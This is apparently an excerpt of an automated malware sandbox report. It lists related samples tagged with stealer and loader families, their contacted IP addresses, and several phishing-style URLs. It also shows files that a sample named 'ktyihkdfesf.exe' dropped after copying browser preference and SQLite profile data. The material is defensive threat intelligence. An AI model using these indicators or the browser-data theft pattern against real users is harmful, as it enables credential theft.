                                                                                                                                                                                                                                                                                                https://kubota.highq.com/kubota/viewUserProfile.action?metaData.encryptTargetUserID=D1l4_GI3rHw=&metaData.updateUserProfileProcess=trueGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 173.222.162.64
                                                                                                                                                                                                                                                                                                QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                • 173.222.162.64
                                                                                                                                                                                                                                                                                                CROC000400 .pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 173.222.162.64
                                                                                                                                                                                                                                                                                                UYJ0oreVew.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 173.222.162.64
                                                                                                                                                                                                                                                                                                L1SrJoDQvG.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 173.222.162.64
                                                                                                                                                                                                                                                                                                https://forms.office.com/Pages/ShareFormPage.aspx?id=z5Knz2h3QUOIV4F1TCr6H8l1dBxA_RZAr7lBOGCmz8VURUlLQURGTlFGTEQ0QzdESlFMT1lGUlpRWi4u&sharetoken=rKEHIuU7H8od3T6m0C0ZGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 173.222.162.64
                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                                                                                • 173.222.162.64
                                                                                                                                                                                                                                                                                                QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                                • 173.222.162.64
                                                                                                                                                                                                                                                                                                D2Cw8gWOXj.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                                                • 173.222.162.64
                                                                                                                                                                                                                                                                                                3b5074b1b5d032e5620f69f9f700ff0ehttps://kubota.highq.com/kubota/externalAccess.action?linkParam=248Md4JKaxiIU4vwlQaNq5FLgPVNq03doY6pcXaLJD4%3D&documentDownload=linkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 20.198.119.143
                                                                                                                                                                                                                                                                                                • 20.198.118.190
                                                                                                                                                                                                                                                                                                https://kubota.highq.com/kubota/viewUserProfile.action?metaData.encryptTargetUserID=D1l4_GI3rHw=&metaData.updateUserProfileProcess=trueGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 20.198.119.143
                                                                                                                                                                                                                                                                                                • 20.198.118.190
                                                                                                                                                                                                                                                                                                https://track.samsupport.jmsend.com/z.z?l=aHR0cHM6Ly9zYW1zdXBwb3J0cy1jb20uam1haWxyb3V0ZS5uZXQveC91P3U9ZWJlNTI4YmMtYTNjMS00NjI0LWFmZjEtYzcwNDJmMjczZWIw&r=14771356625&d=20437066&p=1&t=h&h=40dfe9be3647ce867f619b07dd91c655Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 20.198.119.143
                                                                                                                                                                                                                                                                                                • 20.198.118.190
                                                                                                                                                                                                                                                                                                Employee_Letter.PDFuJPefyDW1j.urlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 20.198.119.143
                                                                                                                                                                                                                                                                                                • 20.198.118.190
                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                                • 20.198.119.143
                                                                                                                                                                                                                                                                                                • 20.198.118.190
                                                                                                                                                                                                                                                                                                8N8j6QojHn.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 20.198.119.143
                                                                                                                                                                                                                                                                                                • 20.198.118.190
                                                                                                                                                                                                                                                                                                8N8j6QojHn.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 20.198.119.143
                                                                                                                                                                                                                                                                                                • 20.198.118.190
                                                                                                                                                                                                                                                                                                PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                                                                • 20.198.119.143
                                                                                                                                                                                                                                                                                                • 20.198.118.190
                                                                                                                                                                                                                                                                                                PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                                                                • 20.198.119.143
                                                                                                                                                                                                                                                                                                • 20.198.118.190
                                                                                                                                                                                                                                                                                                37f463bf4616ecd445d4a1937da06e19FinTP-Update.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                hrupdate.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                hrupdate.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                billys.exeGet hashmaliciousMeduza StealerBrowse
                                                                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                ruppert.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                2JSGOlbNym.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                4hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                                                                • 149.154.167.99
                                                                                                                                                                                                                                                                                                QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                • 116.203.12.114
                                                                                                                                                                                                                                                                                                • 149.154.167.99

                                                                                                                                                                                                                                                                                                Dropped Files

                                                                                                                                                                                                                                                                                                No context

                                                                                                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                                                                                                C:\ProgramData\K6FKFCT00ZU3\0HDJEU

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):10237
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.498288591230544
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                                                                                                                                                                                                                                                MD5:0F58C61DE9618A1B53735181E43EE166
                                                                                                                                                                                                                                                                                                SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                                                                                                                                                                                                                                                SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                                                                                                                                                                                                                                                SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                                                                C:\ProgramData\K6FKFCT00ZU3\1VSRIW

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):155648
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                                                                MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                                                                SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                                                                SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                                                                SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\K6FKFCT00ZU3\2VS2DJ

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\K6FKFCT00ZU3\F3WB1NY58

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8745947603342119
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                                                                                                                                                                MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                                                                                                                                                                SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                                                                                                                                                                SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                                                                                                                                                                SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\K6FKFCT00ZU3\K6FKFK

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                                                                MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                                                                SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                                                                SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                                                                SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\K6FKFCT00ZU3\LFKFUKFUS

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\K6FKFCT00ZU3\V37YCB

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                                                                                                MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                                                                                                SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                                                                                                                SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                                                                                                SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\K6FKFCT00ZU3\XBAIMG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):294912
                                                                                                                                                                                                                                                                                                Entropy (8bit):0.08436837154972243
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23v2:51zkVmvQhyn+Zoz67f
                                                                                                                                                                                                                                                                                                MD5:BDDB3A7A4643B027E8E743D32B86297D
                                                                                                                                                                                                                                                                                                SHA1:AACAA39E60FB34908241F75550B1CEDDA50E37D1
                                                                                                                                                                                                                                                                                                SHA-256:13BC4A6A15651C116209341E97255C67980005927DFD9E91236E2E1517AF97EF
                                                                                                                                                                                                                                                                                                SHA-512:9A6244248CA636DB12AEC2E56DEAEAA2D62ED8378EA5A1D9947938DA15CA66BC4EDF11BF7CCC92E43734449EBECD03CF538BB61FCF90798DEBFD65098BC2A444
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\ProgramData\K6FKFCT00ZU3\XBS26P

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                                                                Entropy (8bit):1.2678890710798698
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:384:L/2qOB1nxCkMWSA1LyKOMq+8iP5GDHP/0jMVum8:Kq+n0JW91LyKOMq+8iP5GLP/0Z
                                                                                                                                                                                                                                                                                                MD5:4410796A6E7A6E64DCA5EC2B9B8941AD
                                                                                                                                                                                                                                                                                                SHA1:14B68BB9ACACE8FD53484EC0F538E5B9CBC169DE
                                                                                                                                                                                                                                                                                                SHA-256:E675A0BB00F57AABC0D8190BDEBE53175794578111BAD71FB30E32221F1E4915
                                                                                                                                                                                                                                                                                                SHA-512:35EF59EBA6F084DDA22D48B8C58183609C20162328B0F022FFB329FCCC3BC28EAF832858B420EC0F203C9D36A9CF9F902C22E7BBBCAA870E98E1FA10E61CCB19
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ .......[...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\349002e7-5784-4b38-b5ad-adfe86be7cf7.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):46255
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.087087347738988
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:8MkbJrT8IeQc5OKJ3Di1zNtPL2uzh9LVjhycnCiobJDSgzMMd6qD47u30p:8Mk1rT8HGKeFFobtSmd6qE7f
                                                                                                                                                                                                                                                                                                MD5:02B25DE32A4B60D501FB1D4FBD201A9F
                                                                                                                                                                                                                                                                                                SHA1:5F7EC7B9CCB946F444440B3524049F9DDCC61EAB
                                                                                                                                                                                                                                                                                                SHA-256:7549591876AE8D8EF5347926EB4A25299779E8C2D933D179224DF0FEE0A3255E
                                                                                                                                                                                                                                                                                                SHA-512:ABC4D9318AC6709C0EF7E1568A7018BBDCB70BF58CC0F52DF40BDB0AA3D9F1EE1E24E8E02FFF93A4626027B92DCD0061CFA426E2B006B6F92D702A4FC59AF435
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379149892090941","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"bc087678-5b99-4771-a549-04bf95f5d8e4"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6q

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\5cebb3d5-95c4-4ae6-a58e-d6ce4d421d16.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):46131
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.087435435461075
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:8MkbJrT8IeQc5dKJ/Di1zNtPS92uzh9LVjhycnCiobJDSgzMMd6qD47u30p:8Mk1rT8H1KxLFFobtSmd6qE7f
                                                                                                                                                                                                                                                                                                MD5:AC6F70083E164B3012EB631864BB950C
                                                                                                                                                                                                                                                                                                SHA1:2A29F9A11667660B23B23C9B70D674D7E00AC908
                                                                                                                                                                                                                                                                                                SHA-256:096C054299E48F231FE1780A6B3B2B7E1319402C3A50DDEDFFABEE52652BE9E3
                                                                                                                                                                                                                                                                                                SHA-512:9C709A80B6F613E1048B44A583BB73FC49DAC75E3F1ABE8C996F98DF5E00A640121B9FEAE0E49A2A84E3CC178D1A710F06634731B2A392A142DCE7BE52F65C49
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13379149892090941","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"bc087678-5b99-4771-a549-04bf95f5d8e4"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6q

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\65f0b995-b006-4900-a1c8-f80c6af8d91c.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):46178
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.087175637460811
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:8MkbJrT8IeQc5dKJ3Di1zNtPS92uzh9LVjhycnCiobJDSgzMMd6qD47u30p:8Mk1rT8H1KNLFFobtSmd6qE7f
                                                                                                                                                                                                                                                                                                MD5:BFDBEDC43B4926B90798094CF49C71FA
                                                                                                                                                                                                                                                                                                SHA1:1C9E4E33A0F47EEFF7FDA445BF85E11417958F08
                                                                                                                                                                                                                                                                                                SHA-256:E73B8DB9F50E358C9F9CE2D5BA8C4A6981E4F75F3058A10FD129C78F6C96EB55
                                                                                                                                                                                                                                                                                                SHA-512:22BF0FC0B913500CF19AF0669B3ACD247E079A3A4E1FA1F6F10F74E55BDF15B2F36673EC59E22BFAF9C86AC8972763107544D7A6EEDA3BC0985EA8A4F2A4AE66
                                                                                                                                                                                                                                                                                                Malicious:false
